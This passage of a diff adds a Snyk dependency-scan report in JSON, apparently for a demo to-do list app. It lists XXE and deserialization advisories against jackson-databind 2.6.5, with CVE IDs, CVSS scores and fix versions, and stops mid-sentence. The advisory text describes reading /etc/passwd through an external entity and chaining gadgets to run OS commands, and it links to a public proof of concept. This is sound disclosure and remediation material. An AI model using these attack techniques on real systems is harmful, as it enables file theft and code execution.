"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "credit": [ + "Bartosz Baranowski" + ], + "semver": { + "vulnerable": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.4", + "2.9.10.7", + "2.10.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", + "className": "DOMSerializer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2589", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "cvssV3BaseScore": 5.8, + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:50:46.628614Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:31.367594Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 5.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. 
By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", + "epssDetails": { + "percentile": "0.68432", + "probability": "0.00275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25649" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-288c-cq4h-88gq" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-04T11:58:40.054903Z", + "functions_new": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + 
"functionId": { + "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-04T11:54:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-04T15:22:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.249736Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": 
"https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:42.491903Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35490" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:37:26.422837Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:32:48Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:26.923105Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": 
"SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.762302Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-11T09:50:57.453912Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). 
These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35491" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:40:53.658144Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:40:13Z", + "exploitDetails": { + "sources": [], + 
"maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:57.453912Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "bu5yer" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2999", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + }, + { + "url": 
"https://github.com/Al1ex/CVE-2020-35728", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:43.478254Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", + "epssDetails": { + "percentile": "0.80006", + "probability": "0.00674", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35728" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-27T14:34:18.527699Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": 
"2020-12-27T14:05:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-27T17:34:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.852735Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", + "title": "GitHub Commit" + }, + { + "url": 
"https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.093517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is 